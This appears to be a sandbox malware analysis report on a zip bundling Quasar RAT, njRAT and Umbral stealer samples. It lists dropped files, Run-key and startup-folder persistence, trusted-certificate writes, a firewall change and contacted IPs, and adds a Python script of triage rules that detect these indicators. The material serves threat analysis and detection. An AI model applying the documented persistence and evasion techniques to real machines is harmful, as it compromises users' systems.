Malware Analysis Report

2024-11-13 18:03

Sample ID 241108-k8svdsypbt
Target 240927-mh3m1sxgrm_pw_infected.zip
SHA256 de59c7b1cef753487469ad372c2dbebfa31043fc403aceeadbb24cab42e79889
Tags
pdf link quasar umbral njrat romka defense_evasion discovery evasion exploit persistence privilege_escalation ransomware spyware stealer trojan upx execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

de59c7b1cef753487469ad372c2dbebfa31043fc403aceeadbb24cab42e79889

Threat Level: Known bad

The file 240927-mh3m1sxgrm_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

Windows security bypass

Quasar family

njRAT/Bladabindi

Umbral

Quasar payload

Umbral family

Quasar RAT

UAC bypass

Njrat family

Detect Umbral payload

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Possible privilege escalation attempt

Drops file in Drivers directory

Manipulates Digital Signatures

Blocklisted process makes network request

.NET Reactor protector

Unexpected DNS network traffic destination

Drops startup file

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Event Triggered Execution: Component Object Model Hijacking

Modifies file permissions

Password Policy Discovery

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Obfuscated Files or Information: Command Obfuscation

Adds Run key to start application

Looks up external IP address via web service

Sets desktop wallpaper using registry

UPX packed file

Suspicious use of SetThreadContext

AutoIT Executable

Enumerates processes with tasklist

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

HTTP links in PDF interactive object

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

System Location Discovery: System Language Discovery

Browser Information Discovery

Event Triggered Execution: Netsh Helper DLL

Program crash

NSIS installer

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Kills process with taskkill

Runs net.exe

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Runs regedit.exe

Delays execution with timeout.exe

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious behavior: AddClipboardFormatListener

NTFS ADS

Modifies Internet Explorer settings

Modifies registry class

Enumerates system info in registry

Scheduled Task/Job: Scheduled Task

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Gathers network information

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-08 09:18

Signatures

Detect Umbral payload

Matches: 1 (no indicator detail exported)

Njrat family

njrat

Quasar family

quasar

Quasar payload

Matches: 1 (no indicator detail exported)

Umbral family

umbral

AutoIT Executable

Matches: 1 (no indicator detail exported)

HTTP links in PDF interactive object

pdf link
Matches: 1 (no indicator detail exported)

Unsigned PE

Matches: 1 (no indicator detail exported)

NSIS installer

installer
Matches: 1 (no indicator detail exported)

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-08 09:16

Reported

2024-11-08 09:21

Platform

win7-20241023-en

Max time kernel

150s

Max time network

164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\vir.exe"

Signatures

Detect Umbral payload

Matches: 2 (no indicator detail exported)

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Matches: 11 (no indicator detail exported)

Umbral

stealer umbral

Umbral family

umbral

njRAT/Bladabindi

trojan njrat

Blocklisted process makes network request

Process | Events
C:\Windows\SysWOW64\mshta.exe | 3 network requests (no indicator detail exported)

Drops file in Drivers directory

Description | Indicator | Process
File opened for modification | C:\Windows\system32\DRIVERS\SETE8D9.tmp | C:\Windows\system32\DrvInst.exe
File created | C:\Windows\system32\DRIVERS\SETE8D9.tmp | C:\Windows\system32\DrvInst.exe
File opened for modification | C:\Windows\system32\DRIVERS\droidcam.sys | C:\Windows\system32\DrvInst.exe
Note: DrvInst.exe is the Windows driver installer; droidcam.sys is the DroidCam virtual camera driver that bloatware\1.exe unpacks into C:\Program Files (x86)\DroidCam\lib\ (see Drops file in Program Files directory), so these writes are the driver installation of that bundled package.

Manipulates Digital Signatures

Description | Indicator | Process
Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = [certificate blob omitted] | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Set value (data) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = [certificate blob omitted] | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = [certificate blob omitted] | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Note: the same certificate (thumbprint 430E77033E527F42DC67BC6984D33D889A73F0CD) is added to the TrustedPeople store of both the user (HKU) and the machine (HKLM). TrustedPeople holds explicitly trusted end-entity certificates, and the HKLM write requires the writing IEXPLORE.EXE instance to be elevated. On an affected host, remove the certificate from both stores by thumbprint.

Modifies Windows Firewall

evasion
Process | Events
C:\Windows\SysWOW64\netsh.exe | 1 (no indicator detail exported)

Possible privilege escalation attempt

exploit
Process | Events
C:\Windows\SysWOW64\icacls.exe | 2
C:\Windows\SysWOW64\takeown.exe | 2
Note: no indicator detail exported; the same takeown.exe and icacls.exe processes are listed under Modifies file permissions below.

.NET Reactor protector

Matches: 36 (no indicator detail exported)

Drops startup file

Description | Indicator | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Process | Executions (35 events; no indicator detail exported)
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Google.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\regmess.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe | 1
C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | 1
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\the.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wimloader.dll | 1
C:\Program Files\SubDir\Romilyaa.exe | 12
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe | 1
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe | 2
C:\Program Files (x86)\DroidCam\lib\insdrv.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe | 1
C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\CLWCP.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll | 1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | 1
C:\Users\Admin\AppData\Local\Temp\Umbral.exe | 1
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe | 1

Loads dropped DLL

Loading process | Events (48 in total; no indicator detail exported)
C:\Windows\SysWOW64\cmd.exe | 19
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | 11
C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | 5
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe | 3
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | 2
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe | 2
C:\Windows\SysWOW64\regsvr32.exe | 2
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe | 1
C:\Windows\system32\regsvr32.exe | 1
(process not recorded) | 2

Modifies file permissions

discovery
Process | Events
C:\Windows\SysWOW64\takeown.exe | 2
C:\Windows\SysWOW64\icacls.exe | 2
(no indicator detail exported)

Unexpected DNS network traffic destination

Description | Indicator
Destination IP | 185.93.182.46
Destination IP | 74.208.156.127
Destination IP | 5.157.51.190
Destination IP | 172.105.221.253

Adds Run key to start application

persistence
Description | Indicator | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." | C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
Note: the value name 7c148ac38012fc3caa04b1bbe75feba0 matches the executable that !FIXInj.exe copies into the Startup folder (see Drops startup file), and the command relaunches the Temp copy with a trailing ".." argument, the Run-value form used by njRAT/Bladabindi. Both the user (HKU) Run key and the machine Wow6432Node Run key are set.

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description | Indicator | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SysWOW64\cmd.exe

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Password Policy Discovery

discovery

AutoIT Executable

Matches: 3 (no indicator detail exported)

Drops file in System32 directory

Process C:\Windows\system32\DrvInst.exe (17 events):
File created | C:\Windows\System32\DriverStore\INFCACHE.0
File created | C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\droidcam.inf_amd64_neutral_d98d50465b5eb493\droidcam.PNF
File created | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp
File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD098.tmp
File created | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp
File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD099.tmp
File created | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp
File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\SETD09A.tmp
File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.cat
File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.inf
File opened for modification | C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.sys
File opened for modification | C:\Windows\System32\DriverStore\infpub.dat (2 events)
File opened for modification | C:\Windows\System32\DriverStore\infstor.dat
File opened for modification | C:\Windows\System32\DriverStore\infstrng.dat (2 events)

Process C:\Program Files (x86)\DroidCam\lib\insdrv.exe (3 events):
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt
File opened for modification | C:\Windows\System32\DriverStore\infpub.dat
File opened for modification | C:\Windows\System32\DriverStore\infstrng.dat

Enumerates processes with tasklist

discovery
Process | Events
C:\Windows\SysWOW64\tasklist.exe | 1 (no indicator detail exported)

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" | C:\Windows\SysWOW64\reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\Wallpaper = "c:\\temp\\bg.bmp" | C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\CLWCP.exe
Note: the first value is written by reg.exe as a plain string, so the literal %username% is stored unexpanded; the second, written by CLWCP.exe, points at c:\temp\bg.bmp.

UPX packed file

upx
Matches: 7 (no indicator detail exported)

Drops file in Program Files directory

Process C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe, 27 events, all under C:\Program Files (x86)\DroidCam\ (the DroidCam package it unpacks):
File created | DroidCamApp.exe
File created | Uninstall.exe
File created | Licence.txt
File created | loading.gif
File created | With Stats.lnk
File created | Toggle HD Mode.lnk
File created | plist.dll
File created | usbmuxd.dll
File created | swscale-5.dll
File created | avcodec-58.dll
File created | avutil-56.dll
File created | libwinpthread-1.dll
File created | vc_redist.x86.exe
File opened for modification | vc_redist.x86.exe
File created | adb\adb.exe
File created | adb\AdbWinApi.dll
File created | adb\AdbWinUsbApi.dll
File created | lib\insdrv.exe
File created | lib\install.bat
File created | lib\DroidCamFilter32.ax
File created | lib\DroidCamFilter64.ax
File created | lib\droidcam.inf
File opened for modification | lib\droidcam.inf
File created | lib\droidcam.cat
File opened for modification | lib\droidcam.cat
File created | lib\droidcam.sys
File opened for modification | lib\droidcam.sys

Process C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp, 18 events, all under C:\Program Files\Winaero Tweaker\ (an Inno Setup installer, hence the is-XXXXX.tmp staging files and unins000.dat):
File created | unins000.dat
File opened for modification | unins000.dat
File opened for modification | WinaeroTweaker.exe
File opened for modification | WinaeroTweakerHelper.exe
File opened for modification | Elevator.exe
File opened for modification | WinaeroControls.dll
File opened for modification | WinaeroTweaker_i386.dll
File opened for modification | WinaeroTweaker_x86_64.dll
File created | is-QLKRB.tmp
File created | is-5TO3A.tmp
File created | is-818V2.tmp
File created | is-7KHEF.tmp
File created | is-15QD7.tmp
File created | is-STKIK.tmp
File created | is-8PQ85.tmp
File created | is-V39CU.tmp
File created | is-43JC1.tmp
File created | is-4CTO5.tmp

Process C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe, 2 events:
File created | C:\Program Files\SubDir\Romilyaa.exe
File opened for modification | C:\Program Files\SubDir\Romilyaa.exe
Note: SubDir is the default install subdirectory of the Quasar client, consistent with the Quasar RAT detection above; Romilyaa.exe is then run twelve times (see Executes dropped EXE).

Drops file in Windows directory

Process C:\Windows\system32\DrvInst.exe (10 events):
File created | C:\Windows\INF\oem2.inf
File opened for modification | C:\Windows\INF\oem2.inf
File created | C:\Windows\INF\oem2.PNF
File opened for modification | C:\Windows\INF\setupapi.dev.log (2 events)
File opened for modification | C:\Windows\INF\setupapi.ev1
File opened for modification | C:\Windows\INF\setupapi.ev2
File opened for modification | C:\Windows\INF\setupapi.ev3
File opened for modification | C:\Windows\setupact.log
File opened for modification | C:\Windows\setuperr.log

Process C:\Program Files (x86)\DroidCam\lib\insdrv.exe (2 events):
File opened for modification | C:\Windows\INF\setupapi.app.log
File opened for modification | C:\Windows\INF\setupapi.dev.log

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description | Indicator | Process
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe
Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe
Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe
Note: all three events are reads. netsh.exe enumerates this key every time it starts, to load its registered helper DLLs, so without a Set value on the key these events are a side effect of the netsh.exe firewall change (see Modifies Windows Firewall) rather than a helper DLL being installed for persistence.
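
The behavioral1 indicator rows above (Manipulates Digital Signatures, Adds Run key to start application, Drops startup file, Checks whether UAC is enabled, Event Triggered Execution: Netsh Helper DLL, Unexpected DNS network traffic destination, Sets desktop wallpaper) are flattened "Description Indicator Process Target" records whose columns are separated only by spaces. The Python script below is an added example, not part of the sandbox output or of any tool it uses: it parses such rows back into columns and runs a few host-triage rules over them, including the netsh caveat noted above. The rule names and finding fields are my own; the sample rows are copied from this report, with the placeholder text "[certificate blob omitted]" standing in for the blob the report elides.

```python
"""Parse the flattened indicator rows of a sandbox report and apply triage rules."""
import re
from typing import Dict, List

# First-column event descriptions used in the report, longest first so that
# "Key value queried" is never split as "Key queried".
DESCRIPTIONS = sorted(
    ["Set value (str)", "Set value (data)", "File created",
     "File opened for modification", "Key value enumerated",
     "Key value queried", "Key opened", "Key queried", "Destination IP", "N/A"],
    key=len, reverse=True)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\")
THUMBPRINT = re.compile(r"\\Certificates\\([0-9A-Fa-f]{40})\\Blob")

# Constructed sample: rows copied from the behavioral1 section of the report
# (the certificate blob is elided there as well).
SAMPLE_ROWS = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c148ac38012fc3caa04b1bbe75feba0 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\!FIXInj.exe\" .." C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A',
    r'File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe N/A',
    r'Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\430E77033E527F42DC67BC6984D33D889A73F0CD\Blob = [certificate blob omitted] C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A',
    r'Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\cmd.exe N/A',
    r'Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" C:\Windows\SysWOW64\reg.exe N/A',
    "Destination IP 185.93.182.46 N/A N/A",
    r"N/A N/A C:\Windows\SysWOW64\mshta.exe N/A",
]


def parse_row(row: str) -> Dict[str, str]:
    """Split one 'Description Indicator Process Target' row into its columns.

    Columns are space-separated and both the indicator and the process may
    contain spaces, so the split is anchored on the known description prefixes
    and on the rightmost token that begins a Windows path (the process column).
    Quoted registry data begins with a quote, never with a drive letter, so it
    is not mistaken for the process. The last token is the Target column.
    """
    desc = next((d for d in DESCRIPTIONS if row.startswith(d + " ")), None)
    if desc is None:
        raise ValueError(f"unknown description column: {row!r}")
    tokens = row[len(desc) + 1:].split(" ")
    body, target = tokens[:-1], tokens[-1]
    path_starts = [i for i, t in enumerate(body) if t.startswith("C:\\")]
    cut = path_starts[-1] if path_starts else len(body) - 1  # process is "N/A"
    return {"description": desc, "indicator": " ".join(body[:cut]),
            "process": " ".join(body[cut:]), "target": target}


def unescape(data: str) -> str:
    """Undo the report's quoting of REG_SZ data: outer quotes, then \\\\ and \\"."""
    return data.strip('"').replace("\\\\", "\\").replace('\\"', '"')


def triage(rows: List[str]) -> List[Dict[str, object]]:
    """Run host-triage rules over the parsed rows; one finding per matching row."""
    findings: List[Dict[str, object]] = []
    for ev in map(parse_row, rows):
        desc, proc = ev["description"], ev["process"]
        key, _, data = ev["indicator"].partition(" = ")  # registry rows carry "key = data"
        is_write = desc.startswith("Set value")
        if is_write and RUN_KEY.search(key):
            cmd = unescape(data)
            findings.append({"rule": "run_key_persistence",
                             "value_name": key.rsplit("\\", 1)[1], "command": cmd,
                             # njRAT/Bladabindi relaunches its copy as "<path>" .. from a Run value
                             "njrat_style": cmd.endswith(" .."), "process": proc})
        elif desc == "File created" and "\\Start Menu\\Programs\\Startup\\" in key:
            findings.append({"rule": "startup_folder_drop", "path": key, "process": proc})
        elif is_write and "\\SystemCertificates\\" in key:
            m = THUMBPRINT.search(key)
            findings.append({"rule": "cert_store_write",
                             "scope": "machine" if key.startswith("\\REGISTRY\\MACHINE") else "user",
                             "store": key.split("\\SystemCertificates\\", 1)[1].split("\\", 1)[0],
                             "thumbprint": m.group(1).upper() if m else "", "process": proc})
        elif is_write and key.lower().endswith("\\control panel\\desktop\\wallpaper"):
            findings.append({"rule": "wallpaper_set", "path": unescape(data), "process": proc})
        elif desc == "Key value queried" and key.endswith("\\Policies\\System\\EnableLUA"):
            findings.append({"rule": "uac_status_check", "process": proc})
        elif key.endswith("\\Microsoft\\NetSh"):
            # netsh.exe reads this key at every start to load its helper DLLs; only a
            # write to it installs a new helper and deserves a persistence alert.
            rule = "netsh_helper_install" if is_write else "netsh_helper_read_benign"
            findings.append({"rule": rule, "process": proc})
        elif desc == "Destination IP":
            findings.append({"rule": "unexpected_dns_destination", "ip": key})
    return findings


def count_by_rule(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Tally findings per rule, for a quick summary line."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[str(f["rule"])] = counts.get(str(f["rule"]), 0) + 1
    return counts


if __name__ == "__main__":
    for finding in triage(SAMPLE_ROWS):
        print(finding)
    print(count_by_rule(triage(SAMPLE_ROWS)))
```

The rules are deliberately narrow: a Run value is flagged regardless of its data, but the njrat_style field only becomes true for the trailing ".." launch convention, and the NetSh rule downgrades plain reads so that a firewall change does not masquerade as helper-DLL persistence. Rows the rules do not cover (such as the mshta.exe row) still parse cleanly and simply produce no finding.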

System Location Discovery: System Language Discovery

discovery
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by process (52 events):
C:\Windows\SysWOW64\cmd.exe | 8
C:\Windows\SysWOW64\xcopy.exe | 7
C:\Windows\SysWOW64\cipher.exe | 4
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | 4
C:\Windows\SysWOW64\reg.exe | 3
C:\Windows\SysWOW64\timeout.exe | 3
C:\Windows\SysWOW64\taskkill.exe | 2
C:\Windows\SysWOW64\net.exe | 2
C:\Windows\SysWOW64\net1.exe | 1
C:\Windows\SysWOW64\notepad.exe | 1
C:\Windows\SysWOW64\PING.EXE | 1
C:\Windows\SysWOW64\mshta.exe | 1
C:\Windows\SysWOW64\icacls.exe | 1
C:\Windows\SysWOW64\regsvr32.exe | 1
C:\Windows\SysWOW64\rundll32.exe | 1
C:\Windows\SysWOW64\regedit.exe | 1
C:\Windows\SysWOW64\WScript.exe | 1
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe | 1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | 1
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe | 1
C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe | 1
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe | 1
Note: opening the NLS\Language key is routine for console utilities, so this signature is low-signal on its own; its value here is the process list, which shows the dropped payloads alongside the LOLBins (cmd.exe, xcopy.exe, cipher.exe, reg.exe, mshta.exe, rundll32.exe, regsvr32.exe, WScript.exe, net.exe, taskkill.exe, timeout.exe) they drive.
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\DroidCam\vc_redist.x86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\DroidCam\vc_redist.x86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\xcopy.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
